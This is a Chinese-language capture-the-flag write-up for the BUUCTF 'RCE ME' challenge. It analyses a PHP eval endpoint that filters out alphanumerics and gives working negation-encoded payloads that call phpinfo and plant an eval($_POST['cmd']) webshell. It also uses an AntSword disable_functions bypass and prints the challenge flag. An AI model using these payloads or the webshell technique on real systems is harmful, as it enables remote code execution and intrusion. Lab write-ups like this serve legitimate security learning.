BUUCTF——RCE ME

进入靶场

<?php
error_reporting(0);
if(isset($_GET['code'])){
            $code=$_GET['code'];
                    if(strlen($code)>40){
                                        die("This is too Long.");
                                                }
                    if(preg_match("/[A-Za-z0-9]+/",$code)){
                                        die("NO.");
                                                }
                    @eval($code);
}
else{
            highlight_file(__FILE__);
}

// ?>

一段php代码

代码分析

这段PHP代码实现了一个简单的代码执行功能，但带有一些安全限制：

功能概述

1. 代码检查是否有GET参数code传入
2. 如果有code参数，会进行以下检查：
   • 长度不能超过40个字符（否则显示"This is too Long."）
   • 不能包含任何字母数字字符（A-Z, a-z, 0-9）（否则显示"NO."）
3. 如果通过检查，则使用eval()执行传入的代码
4. 如果没有code参数，则显示源代码本身

安全限制

• error_reporting(0) 关闭了错误报告
• 长度限制：不超过40字符
• 字符限制：不能包含任何字母和数字
• 使用@抑制eval()可能产生的错误

潜在利用方式

要在这种限制下执行代码，需要：

1. 构造不超过40个字符的payload
2. 完全不使用任何字母和数字
3. 利用PHP允许的特殊字符和符号

可能的利用技术：

• 使用异或运算生成所需字符
• 利用PHP的短标签和特殊符号
• 使用非字母数字的PHP函数调用方式

根据这段代码构造payload

?code=${~%A0%B8%BA%AB}[%A0]();&%A0=phpinfo

成功访问phpinfo

细看了一下phpinfo 还以为跟之前的题一样flag在phpinfo里

结果没找到

但是找到了好多禁用函数

pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,dl

构造一句话木马payload

<?php
error_reporting(0);
$a='assert';
$b=urlencode(~$a);
echo $b;
echo "<br>";
$c='(eval($_POST["cmd"]))';
$d=urlencode(~$c);
echo $d;
 ?>

运行代码

将运行结果拼接到url里

?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%DD%9C%92%9B%DD%A2%D6%D6);

蚁剑测试连接一下

成功连接

但是读取不了数据

之前phpinfo看到php版本是php7

直接使用蚁剑插件disable_functions绕过试试

/readflag

成功拿到flag

flag{3f829afc-68f8-4f76-8e68-7ee4f8fa10ab}